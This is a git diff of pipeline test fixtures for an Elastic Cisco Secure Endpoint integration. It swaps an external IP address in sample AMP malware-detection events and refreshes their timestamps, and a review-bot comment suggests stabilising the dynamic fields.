Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 67524d16665..f413457f352 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -24,7 +24,7 @@ "5ca4bef8de6def53519d4b22632675bb4c1e470b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -38,8 +38,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025200976Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "ingested": "2021-12-09T13:35:39.763772800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -61,7 +61,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -107,7 +107,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
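Review bot: The `event.ingested` line in this hunk changes from `2021-09-30T00:14:44.025200976Z` to `2021-12-09T13:35:39.763772800Z` only because the expected file was regenerated, which is unrelated to the IP fix and will churn again every time the fixture is rebuilt; the hunks at `@@ -117,8 +117,8 @@` and `@@ -194,8 +194,8 @@` carry the same noise. Unless the package already does this, declaring `event.ingested` as a dynamic field in the pipeline test config for this case (elastic-package's `dynamic_fields` mechanism) would keep the expected output stable so diffs show only the intended change. Worth recording in the test config as well, though pre-existing rather than introduced here, is that `data.id` in the re-emitted `event.original` (`6508397899087348000`, next to `detection_id` `6508397899087347713`, which appears to be the same value before rounding) has already lost precision to IEEE-754 double conversion in the sample, so this fixture cannot demonstrate that the pipeline preserves 64-bit event ids intact; a comment such as `"_note": "sample data.id values are double-rounded; detection_id holds the exact id"` in the config, not in the strict-JSON expected file, would save the next maintainer from chasing it.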
@@ -117,8 +117,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025206150Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", + "ingested": "2021-12-09T13:35:39.763777600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-14T20:38:26.000Z", @@ -140,7 +140,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -184,7 +184,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -194,8 +194,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025208580Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763782800Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -215,7 +215,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -260,7 +260,7 @@
 "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -270,8 +270,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025210946Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763788800Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
 "code": "2164260880",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -291,7 +291,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -350,7 +350,7 @@
 "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -367,8 +367,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025213319Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}",
+ "ingested": "2021-12-09T13:35:39.763794800Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -390,7 +390,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -444,7 +444,7 @@
 "f504774b72acfb23a46217aec9c6559fd7e4df64"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -461,8 +461,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025215615Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
+ "ingested": "2021-12-09T13:35:39.763799500Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -484,7 +484,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -537,7 +537,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -554,8 +554,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:44.025217859Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 